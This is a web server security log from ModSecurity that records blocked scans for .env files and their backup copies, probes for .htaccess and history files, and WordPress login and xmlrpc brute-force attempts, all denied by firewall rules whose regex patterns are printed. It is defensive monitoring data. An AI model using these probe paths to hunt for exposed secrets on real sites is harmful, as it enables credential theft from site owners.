[Tue May 26 14:19:59.869693 2026] [security2:error] [pid 606909:tid 607052] [client 5.255.121.146:34276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVet10yRtX9qA7aVUVISQAAAJI"]
[Tue May 26 14:19:59.870716 2026] [security2:error] [pid 606909:tid 607160] [client 5.255.121.146:34262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVet10yRtX9qA7aVUVISwAAAP4"]
[Tue May 26 14:19:59.880810 2026] [core:error] [pid 606909:tid 607049] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.880822 2026] [core:error] [pid 606909:tid 607049] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:20:00.294999 2026] [core:error] [pid 606909:tid 607099] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:20:00.295022 2026] [core:error] [pid 606909:tid 607099] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:20:00.742723 2026] [security2:error] [pid 606909:tid 607107] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeuF0yRtX9qA7aVUVIXAAAAMk"]
[Tue May 26 14:20:01.809173 2026] [autoindex:error] [pid 606909:tid 607162] [client 36.5.145.86:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:20:02.398241 2026] [security2:error] [pid 606909:tid 606971] [remote 165.22.95.96:42232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVeul0yRtX9qA7aVUVIuwAAuj0"]
[Tue May 26 14:20:02.625699 2026] [security2:error] [pid 606909:tid 607139] [client 202.141.83.254:19935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVeul0yRtX9qA7aVUVIwwAAAOk"]
[Tue May 26 14:20:02.625832 2026] [security2:error] [pid 606909:tid 607139] [client 202.141.83.254:19935] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVeul0yRtX9qA7aVUVIwwAAAOk"]
[Tue May 26 14:20:02.662232 2026] [autoindex:error] [pid 606909:tid 607155] [client 36.5.145.86:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:20:02.827884 2026] [security2:error] [pid 606909:tid 607134] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeul0yRtX9qA7aVUVIvwAAAOQ"]
[Tue May 26 14:20:03.550191 2026] [autoindex:error] [pid 606909:tid 607063] [client 36.5.145.86:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:20:04.286387 2026] [security2:error] [pid 606909:tid 607094] [client 208.84.100.148:12540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahVevF0yRtX9qA7aVUVI9wAAALw"]
[Tue May 26 14:20:04.286850 2026] [security2:error] [pid 606909:tid 607146] [client 208.84.100.148:4834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahVevF0yRtX9qA7aVUVI-wAAAPA"]
[Tue May 26 14:20:04.287836 2026] [security2:error] [pid 606909:tid 607064] [client 208.84.100.148:4856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVevF0yRtX9qA7aVUVI-gAAAJ4"]
[Tue May 26 14:20:04.290754 2026] [security2:error] [pid 606909:tid 607102] [client 208.84.100.148:4842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVevF0yRtX9qA7aVUVJAQAAAMQ"]
[Tue May 26 14:20:04.783764 2026] [security2:error] [pid 606909:tid 607109] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVevF0yRtX9qA7aVUVJFgAAAMs"]
[Tue May 26 14:20:06.288935 2026] [security2:error] [pid 606909:tid 607145] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVevV0yRtX9qA7aVUVJOgAAAO8"]
[Tue May 26 14:20:08.538216 2026] [security2:error] [pid 606909:tid 607124] [client 208.84.100.148:4834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahVewF0yRtX9qA7aVUVJeAAAANo"]
[Tue May 26 14:20:09.033619 2026] [security2:error] [pid 606909:tid 607047] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVewF0yRtX9qA7aVUVJfgAAAI0"]
[Tue May 26 14:20:09.571913 2026] [security2:error] [pid 606909:tid 607161] [client 188.52.211.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVewV0yRtX9qA7aVUVJiQAAAP8"]
[Tue May 26 14:20:10.107583 2026] [security2:error] [pid 606909:tid 607127] [client 202.141.30.10:65413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVewl0yRtX9qA7aVUVJogAAAN0"]
[Tue May 26 14:20:10.107707 2026] [security2:error] [pid 606909:tid 607127] [client 202.141.30.10:65413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVewl0yRtX9qA7aVUVJogAAAN0"]
[Tue May 26 14:20:10.431593 2026] [security2:error] [pid 606909:tid 607153] [client 208.84.100.148:5328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahVewl0yRtX9qA7aVUVJqwAAAPc"]
[Tue May 26 14:20:10.431891 2026] [security2:error] [pid 606909:tid 607138] [client 208.84.100.148:5318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahVewl0yRtX9qA7aVUVJrAAAAOg"]
[Tue May 26 14:20:10.432154 2026] [security2:error] [pid 606909:tid 607142] [client 208.84.100.148:5304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahVewl0yRtX9qA7aVUVJrQAAAOw"]
[Tue May 26 14:20:10.433232 2026] [security2:error] [pid 606909:tid 607084] [client 208.84.100.148:5292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahVewl0yRtX9qA7aVUVJrgAAALI"]
[Tue May 26 14:20:10.435486 2026] [security2:error] [pid 606909:tid 607155] [client 208.84.100.148:5262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahVewl0yRtX9qA7aVUVJsQAAAPk"]
[Tue May 26 14:20:10.436581 2026] [security2:error] [pid 606909:tid 607050] [client 208.84.100.148:5264] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahVewl0yRtX9qA7aVUVJsAAAAJA"]
[Tue May 26 14:20:10.438272 2026] [security2:error] [pid 606909:tid 607115] [client 208.84.100.148:5224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahVewl0yRtX9qA7aVUVJswAAANE"]
[Tue May 26 14:20:10.438345 2026] [security2:error] [pid 606909:tid 607150] [client 208.84.100.148:5232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahVewl0yRtX9qA7aVUVJtAAAAPQ"]
[Tue May 26 14:20:10.438422 2026] [security2:error] [pid 606909:tid 607111] [client 208.84.100.148:5172] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahVewl0yRtX9qA7aVUVJtwAAAM0"]
[Tue May 26 14:20:10.438778 2026] [security2:error] [pid 606909:tid 607148] [client 208.84.100.148:5180] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahVewl0yRtX9qA7aVUVJtQAAAPI"]
[Tue May 26 14:20:10.439068 2026] [security2:error] [pid 606909:tid 607066] [client 208.84.100.148:5166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahVewl0yRtX9qA7aVUVJuAAAAKA"]
[Tue May 26 14:20:10.439575 2026] [security2:error] [pid 606909:tid 607050] [client 208.84.100.148:5146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahVewl0yRtX9qA7aVUVJuwAAAJA"]
[Tue May 26 14:20:10.439681 2026] [security2:error] [pid 606909:tid 607077] [client 208.84.100.148:5130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahVewl0yRtX9qA7aVUVJugAAAKs"]
[Tue May 26 14:20:10.439834 2026] [security2:error] [pid 606909:tid 607156] [client 208.84.100.148:5154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahVewl0yRtX9qA7aVUVJuQAAAPo"]
[Tue May 26 14:20:10.440183 2026] [security2:error] [pid 606909:tid 607110] [client 208.84.100.148:5246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahVewl0yRtX9qA7aVUVJsgAAAMw"]
[Tue May 26 14:20:10.440727 2026] [security2:error] [pid 606909:tid 607056] [client 208.84.100.148:5198] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahVewl0yRtX9qA7aVUVJvAAAAJY"]
[Tue May 26 14:20:10.443269 2026] [security2:error] [pid 606909:tid 607048] [client 208.84.100.148:5104] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahVewl0yRtX9qA7aVUVJvgAAAI4"]
[Tue May 26 14:20:10.443415 2026] [security2:error] [pid 606909:tid 607054] [client 208.84.100.148:5074] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahVewl0yRtX9qA7aVUVJwAAAAJQ"]
[Tue May 26 14:20:10.444229 2026] [security2:error] [pid 606909:tid 607092] [client 208.84.100.148:5058] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahVewl0yRtX9qA7aVUVJwwAAALo"]
[Tue May 26 14:20:10.445026 2026] [security2:error] [pid 606909:tid 607070] [client 208.84.100.148:5090] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahVewl0yRtX9qA7aVUVJvQAAAKQ"]
[Tue May 26 14:20:10.503204 2026] [security2:error] [pid 606909:tid 607121] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVewl0yRtX9qA7aVUVJoQAAANc"]
[Tue May 26 14:20:12.733521 2026] [security2:error] [pid 606909:tid 607071] [client 68.183.88.172:59870] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "yourstorybag.com"] [uri "/"] [unique_id "ahVexF0yRtX9qA7aVUVKDwAAAKU"]
[Tue May 26 14:20:13.236017 2026] [security2:error] [pid 606909:tid 607062] [client 202.141.83.254:53972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVexV0yRtX9qA7aVUVKFgAAAJw"]
[Tue May 26 14:20:13.236130 2026] [security2:error] [pid 606909:tid 607062] [client 202.141.83.254:53972] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVexV0yRtX9qA7aVUVKFgAAAJw"]
[Tue May 26 14:20:13.456391 2026] [security2:error] [pid 606909:tid 607122] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVexV0yRtX9qA7aVUVKFQAAANg"]
[Tue May 26 14:20:14.227916 2026] [security2:error] [pid 606909:tid 607000] [remote 14.161.17.36:53760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVexl0yRtX9qA7aVUVKMgAArFo"]
[Tue May 26 14:20:15.679287 2026] [security2:error] [pid 606909:tid 607140] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVex10yRtX9qA7aVUVKaQAAAOo"]
[Tue May 26 14:20:15.721887 2026] [security2:error] [pid 606909:tid 606999] [remote 3.208.180.187:38712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVex10yRtX9qA7aVUVKcAAAmlk"]
[Tue May 26 14:20:17.299483 2026] [security2:error] [pid 606909:tid 607043] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeyF0yRtX9qA7aVUVKrAAAAIk"]
[Tue May 26 14:20:19.593226 2026] [security2:error] [pid 606909:tid 607089] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVey10yRtX9qA7aVUVK6AAAALc"]
[Tue May 26 14:20:21.002726 2026] [security2:error] [pid 606909:tid 607039] [client 202.141.30.10:65281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVezV0yRtX9qA7aVUVLGAAAAIU"]
